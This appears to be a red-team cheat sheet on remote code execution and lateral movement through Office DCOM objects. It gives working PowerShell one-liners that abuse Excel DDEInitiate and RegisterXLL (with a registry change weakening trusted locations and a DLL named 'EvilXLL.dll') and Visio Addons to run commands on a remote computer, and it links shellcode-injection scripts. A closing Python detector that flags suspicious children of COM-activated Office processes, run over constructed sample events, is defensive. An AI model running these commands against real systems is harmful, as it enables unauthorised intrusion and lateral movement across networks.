DCOM via Office

Excel.Application
  DDEInitiate
  RegisterXLL
Outlook.Application
  CreateObject->Shell.Application->ShellExecute
  CreateObject->ScriptControl (office-32bit only)
Visio.InvisibleApp
  Addons
  ExecuteLine
Word.Application
  RunAutoMacro
PowerShell scripts that inject shellcode into excel.exe via ExecuteExcel4Macro over DCOM
>Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
>Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
Using Excel DDE
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS C:\> $excel.DisplayAlerts = $false
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
Using Excel RegisterXLL
Does not work reliably against remote targets
Requires: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1
PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS> $excel.RegisterXLL("EvilXLL.dll")
Using Visio
$visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName"))
$visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc")
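
Detection side, as an added example that is not part of the original notes: an Office application activated over DCOM is started by the DcomLaunch svchost.exe with the -Embedding switch, so a non-Office child process of such an instance is worth triage. The event records and field names below are constructed assumptions; legitimate automation also uses -Embedding, so treat hits as leads rather than verdicts.

```python
import ntpath

# Host binaries for the Office ProgIDs listed on this page.
OFFICE_HOSTS = {"excel.exe", "outlook.exe", "visio.exe", "winword.exe"}
OFFICE16 = r"C:\Program Files\Microsoft Office\root\Office16"
SVCHOST = r"C:\Windows\System32\svchost.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed process-creation records; the field names are assumptions.
EVENTS = [
    {"pid": 4120, "ppid": 812, "image": OFFICE16 + r"\EXCEL.EXE",
     "parent_image": SVCHOST, "cmdline": "EXCEL.EXE /automation -Embedding"},
    {"pid": 5300, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": OFFICE16 + r"\EXCEL.EXE", "cmdline": "cmd.exe /c calc.exe"},
    {"pid": 6000, "ppid": 3000, "image": OFFICE16 + r"\EXCEL.EXE",
     "parent_image": EXPLORER, "cmdline": "EXCEL.EXE C:\\Users\\a\\report.xlsx"},
    {"pid": 6100, "ppid": 6000, "image": r"C:\Windows\splwow64.exe",
     "parent_image": OFFICE16 + r"\EXCEL.EXE", "cmdline": "splwow64.exe 8192"},
    {"pid": 7000, "ppid": 812, "image": OFFICE16 + r"\VISIO.EXE",
     "parent_image": SVCHOST, "cmdline": "VISIO.EXE -Embedding"},
    {"pid": 7100, "ppid": 7000, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": OFFICE16 + r"\VISIO.EXE", "cmdline": "cmd.exe /c calc"},
]

def base(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()

def com_activated_office(events):
    """PIDs of Office hosts started by COM activation (svchost parent, -Embedding switch)."""
    return {
        e["pid"] for e in events
        if base(e["image"]) in OFFICE_HOSTS
        and base(e["parent_image"]) == "svchost.exe"
        and "embedding" in e["cmdline"].lower()
    }

def suspicious_children(events):
    """Non-Office processes whose parent is a COM-activated Office host."""
    parents = com_activated_office(events)
    return [e for e in events
            if e["ppid"] in parents and base(e["image"]) not in OFFICE_HOSTS]

if __name__ == "__main__":
    for hit in suspicious_children(EVENTS):
        print(f'ALERT pid={hit["pid"]} {base(hit["image"])} <- ppid={hit["ppid"]}: {hit["cmdline"]}')
```

PIDs are reused over time, so a production rule should also bound the match by host and time window.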